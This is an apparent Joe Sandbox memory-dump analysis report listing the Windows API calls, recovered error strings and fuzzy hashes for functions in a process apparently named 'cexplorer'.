                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: fe9955054f2ce1dd3d3ea7c1a892a7cbfa4cff1825cf0652b894cedda1b0bf9a
                                                                                                            • Instruction ID: 5759b5efd84f995859e52f7327ba1a9ad683225ea8d99c65330e7a08570074f8
                                                                                                            • Opcode Fuzzy Hash: fe9955054f2ce1dd3d3ea7c1a892a7cbfa4cff1825cf0652b894cedda1b0bf9a
                                                                                                            • Instruction Fuzzy Hash: 1971F0796042008FD715DF69E8A4B16BBE4BF85390F1886ABFC8CCB3A5D770A845CB51
                                                                                                            APIs
                                                                                                              • Part of subcall function 0356B788: VirtualQuery.KERNEL32(?,?,0000001C,00000000,0356B934), ref: 0356B7BB
                                                                                                              • Part of subcall function 0356B788: GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0356B7DF
                                                                                                              • Part of subcall function 0356B788: GetModuleFileNameW.KERNEL32(MZP,?,00000105), ref: 0356B7FA
                                                                                                              • Part of subcall function 0356B788: LoadStringW.USER32(00000000,0000FFE9,?,00000100), ref: 0356B895
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,00000000,00000000,00000000,00000000,00000400,00000000,0356BAA5), ref: 0356B9E1
                                                                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0356BA14
                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0356BA26
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?,00000000,00000000,00000000), ref: 0356BA2C
                                                                                                            • GetStdHandle.KERNEL32(000000F4,0356BAC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000,?), ref: 0356BA40
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,0356BAC0,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,00000001,00000000,?,00000000), ref: 0356BA46
                                                                                                            • LoadStringW.USER32(00000000,0000FFEA,?,00000040), ref: 0356BA6A
                                                                                                            • MessageBoxW.USER32(00000000,?,?,00002010), ref: 0356BA84
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$ByteCharHandleLoadModuleMultiNameStringWideWrite$MessageQueryVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 135118572-0
                                                                                                            • Opcode ID: 0c163e71526a4ac2213a51cda498ad2e8d7d6facedc347134692ae21129f32b3
                                                                                                            • Instruction ID: 85810bb46208734aba569ebe3e6a944376d63a9de4309317f7415ef2bd5a621b
                                                                                                            • Opcode Fuzzy Hash: 0c163e71526a4ac2213a51cda498ad2e8d7d6facedc347134692ae21129f32b3
                                                                                                            • Instruction Fuzzy Hash: C03123B5640309BFEB14EAA4EC52F9A77BCFB44700F5041A2BA04EB1E0DE707E448B65
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: ac547d940d7c60dac1916f9a8e1d13404739ceccc6f5fed875c488b4a1598c67
                                                                                                            • Instruction ID: 2d3d3e949cf3a6fbe58225106593c5e60222d8fc7a9033314008085faa4758aa
                                                                                                            • Opcode Fuzzy Hash: ac547d940d7c60dac1916f9a8e1d13404739ceccc6f5fed875c488b4a1598c67
                                                                                                            • Instruction Fuzzy Hash: 16C1F2AA7003014BD715DA7EECA476EB296BBC4251F1C863BF918CB3B5DA64E8858340
                                                                                                            APIs
                                                                                                              • Part of subcall function 03556508: GetCurrentThreadId.KERNEL32 ref: 0355650B
                                                                                                            • GetTickCount.KERNEL32 ref: 035560F7
                                                                                                            • GetTickCount.KERNEL32 ref: 0355610F
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0355613F
                                                                                                            • GetTickCount.KERNEL32 ref: 0355616A
                                                                                                            • GetTickCount.KERNEL32 ref: 035561A1
                                                                                                            • GetTickCount.KERNEL32 ref: 035561CB
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0355623B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3968769311-0
                                                                                                            • Opcode ID: 7bc76fd7dda9e4c100975d2f9becf246de18478248cf54b276f97c70d4424e80
                                                                                                            • Instruction ID: 68410931949f6e78dfe1ce8411861a4ec8f5fc7bd614ceb0359cfeb69eed6a66
                                                                                                            • Opcode Fuzzy Hash: 7bc76fd7dda9e4c100975d2f9becf246de18478248cf54b276f97c70d4424e80
                                                                                                            • Instruction Fuzzy Hash: F541A1352083C19ED721EE7CE49432EBBD1BF84254F89992EFCD887261EA74E4848712
                                                                                                            APIs
                                                                                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 035E8DA4
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 035E8DAB
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • ERROR SetDialogPath: SHParseDisplayName fail: , xrefs: 035E8E22
                                                                                                            • ERROR SetDialogPath: BrowseObject fail: , xrefs: 035E8E78
                                                                                                            • ERROR SetDialogPath: different thread, xrefs: 035E8DB4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobalThread$CurrentDeleteMessagePostProcessWindow
                                                                                                            • String ID: ERROR SetDialogPath: BrowseObject fail: $ERROR SetDialogPath: SHParseDisplayName fail: $ERROR SetDialogPath: different thread
                                                                                                            • API String ID: 1848064026-4250285729
                                                                                                            • Opcode ID: 245945cfa2ada6906eef8d0b5eec207cafa26e4386f858892c69885e3ba18a56
                                                                                                            • Instruction ID: edde285988ab7f78c5a3b324ce291183af3c4e39dc4a22ebf1e631c4fa594c39
                                                                                                            • Opcode Fuzzy Hash: 245945cfa2ada6906eef8d0b5eec207cafa26e4386f858892c69885e3ba18a56
                                                                                                            • Instruction Fuzzy Hash: 19417575A083099FDB08DFA4F951AAEBBF8FB88710F214476F400E76A0D7316944CB65
                                                                                                            APIs
                                                                                                            • SHGetPathFromIDListW.SHELL32(?,?), ref: 035E7EEC
                                                                                                            • GetLastError.KERNEL32(00000000,035E805E), ref: 035E7FE1
                                                                                                              • Part of subcall function 035E682C: GlobalAddAtomW.KERNEL32(00000000), ref: 035E688E
                                                                                                              • Part of subcall function 035E682C: PostMessageW.USER32(?,?,?,00000000), ref: 035E68AE
                                                                                                              • Part of subcall function 035E682C: GlobalDeleteAtom.KERNEL32(?), ref: 035E68BC
                                                                                                            Strings
                                                                                                            • ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: , xrefs: 035E7F59
                                                                                                            • ERROR GetPathFromPIDL: SHGetPathFromIDList fail: , xrefs: 035E8006
                                                                                                            • error, xrefs: 035E7EFC
                                                                                                            • ERROR GetPathFromPIDL: GetDisplayName fail: , xrefs: 035E7FB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AtomGlobal$DeleteErrorFromLastListMessagePathPost
                                                                                                            • String ID: ERROR GetPathFromPIDL: GetDisplayName fail: $ERROR GetPathFromPIDL: SHCreateItemFromIDList fail: $ERROR GetPathFromPIDL: SHGetPathFromIDList fail: $error
                                                                                                            • API String ID: 1891711059-4188884885
                                                                                                            • Opcode ID: c4deb995a0ace60670ad429dbeeaf3545249541a7d6867956f0f0ebdefee8b1b
                                                                                                            • Instruction ID: 02f2198170d568dcadffc681d8d769c162aea3a7124b1abf94180010341cb1a1
                                                                                                            • Opcode Fuzzy Hash: c4deb995a0ace60670ad429dbeeaf3545249541a7d6867956f0f0ebdefee8b1b
                                                                                                            • Instruction Fuzzy Hash: 72412034A0534A9BCB58EBA4E854A9EB7B5FF88300F1041E5E814A7360DB34AF45CF51
                                                                                                            APIs
                                                                                                            • SetWindowsHookExW.USER32(00000007,035E9790,MZP,00000000), ref: 035E9927
                                                                                                            • SetWindowsHookExW.USER32(00000005,035E988C,MZP,00000000), ref: 035E9951
                                                                                                            • TranslateMessage.USER32(?), ref: 035E9967
                                                                                                            • DispatchMessageW.USER32(?), ref: 035E9970
                                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 035E997F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Message$HookWindows$DispatchTranslate
                                                                                                            • String ID: MZP
                                                                                                            • API String ID: 3988588355-2889622443
                                                                                                            • Opcode ID: ab9da512e1ac6d9a810c0a669f811217fc2370923b3db6bd961e359cab8b7cf3
                                                                                                            • Instruction ID: 4cb17ecc36481fc719318e5760321ec31189bb0f50d9dc90d2d1e5c0eefc37e2
                                                                                                            • Opcode Fuzzy Hash: ab9da512e1ac6d9a810c0a669f811217fc2370923b3db6bd961e359cab8b7cf3
                                                                                                            • Instruction Fuzzy Hash: E4115E74A40309AFEB44EBA8EC85FAA73F8FB49700F044055F904DB2A4D774E845DBA1
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8,?,?,?,?,035572CE,035550B3,035550FA,?,?), ref: 0355712D
                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8,?,?,?,?,035572CE,035550B3,035550FA,?), ref: 03557133
                                                                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8,?,?,?), ref: 0355714E
                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,035571A8), ref: 03557154
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                            • API String ID: 3320372497-2970929446
                                                                                                            • Opcode ID: 7953d79114716f86f8b611786d14b46e172766e0816fed27169f3b437f07acd2
                                                                                                            • Instruction ID: 6155064ea2ca723de11240d780280e117146f4558a93be8ac6e102d8cce49c32
                                                                                                            • Opcode Fuzzy Hash: 7953d79114716f86f8b611786d14b46e172766e0816fed27169f3b437f07acd2
                                                                                                            • Instruction Fuzzy Hash: C5F046986407C2BDE610F2607C12F6E227CB384E50F580147BA64DD0F5C6B060C49A21
                                                                                                            APIs
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 035E9B0F
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 035E9B2C
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 035E9B49
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 035E9B66
                                                                                                            • UnhookWindowsHookEx.USER32(?), ref: 035E9B83
                                                                                                            • PostMessageW.USER32(0000FFFF,00000000,00000000,00000000), ref: 035E9B93
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookUnhookWindows$MessagePost
                                                                                                            • String ID:
                                                                                                            • API String ID: 3984533346-0
                                                                                                            • Opcode ID: 1157d07f5cd797f2430f2113c1bc2ea65e3b908a33b6ca4b7dd92c10571cb8f7
                                                                                                            • Instruction ID: 7b141feb0f2743b310c13d309a772347af0a39e20de21067724caa2b0fb51304
                                                                                                            • Opcode Fuzzy Hash: 1157d07f5cd797f2430f2113c1bc2ea65e3b908a33b6ca4b7dd92c10571cb8f7
                                                                                                            • Instruction Fuzzy Hash: 10215D796043009FE71AEA58E488F6477E4FB9A300F454089F900DF3B5C378E849EB51
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543BE
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543C4
                                                                                                            • GetStdHandle.KERNEL32(000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543E3
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000,?,00000000,?,?,00000000,03554D35), ref: 035543E9
                                                                                                            • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,00000000,000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000,?), ref: 03554400
                                                                                                            • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,00000000,000000F4,03553504,00000000,?,00000000,00000000,000000F4,03553508,00000000), ref: 03554406
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3320372497-0
                                                                                                            • Opcode ID: 40a7d65b40c3662cfbc5939f71a90fef1db081d73846bb41c4390b3834194280
                                                                                                            • Instruction ID: b0fda56dc3e57a573e4252eaf7ecf80949838aab5ff38afbd06c034a788ad134
                                                                                                            • Opcode Fuzzy Hash: 40a7d65b40c3662cfbc5939f71a90fef1db081d73846bb41c4390b3834194280
                                                                                                            • Instruction Fuzzy Hash: 2C01A4ED245351BEE101F2A9BC98F6F62BCEB986A9F104652791CDA0F0CA20AC448771
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000000), ref: 03553B8B
                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 03553BA1
                                                                                                            • Sleep.KERNEL32(00000000), ref: 03553BCF
                                                                                                            • Sleep.KERNEL32(0000000A,00000000), ref: 03553BE5
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Sleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 3472027048-0
                                                                                                            • Opcode ID: 42ea0d57a6750102bd73298e0ad3f41974eb6ef704f7a53cbdecf75947008d93
                                                                                                            • Instruction ID: 94834c388c01950cba76b9bc0fb5d6f35ac95e6bdbfc13ee8222142e8fd2707b
                                                                                                            • Opcode Fuzzy Hash: 42ea0d57a6750102bd73298e0ad3f41974eb6ef704f7a53cbdecf75947008d93
                                                                                                            • Instruction Fuzzy Hash: E2C108BA6013518FC715CF69F4A4716BBA1FB85350F0886AFEC49CB3A5C770A44AC790
                                                                                                            APIs
                                                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0356B934), ref: 0356B7BB
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0356B7DF
                                                                                                            • GetModuleFileNameW.KERNEL32(MZP,?,00000105), ref: 0356B7FA
                                                                                                            • LoadStringW.USER32(00000000,0000FFE9,?,00000100), ref: 0356B895
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.1943816459.0000000003551000.00000020.00000001.01000000.0000000F.sdmp, Offset: 03550000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.1943789146.0000000003550000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944643096.00000000035F1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944693405.00000000035FA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944750375.00000000035FB000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944776841.00000000035FC000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            • Associated: 00000002.00000002.1944805174.00000000035FF000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_3550000_cexplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileModuleName$LoadQueryStringVirtual
                                                                                                            • String ID: MZP
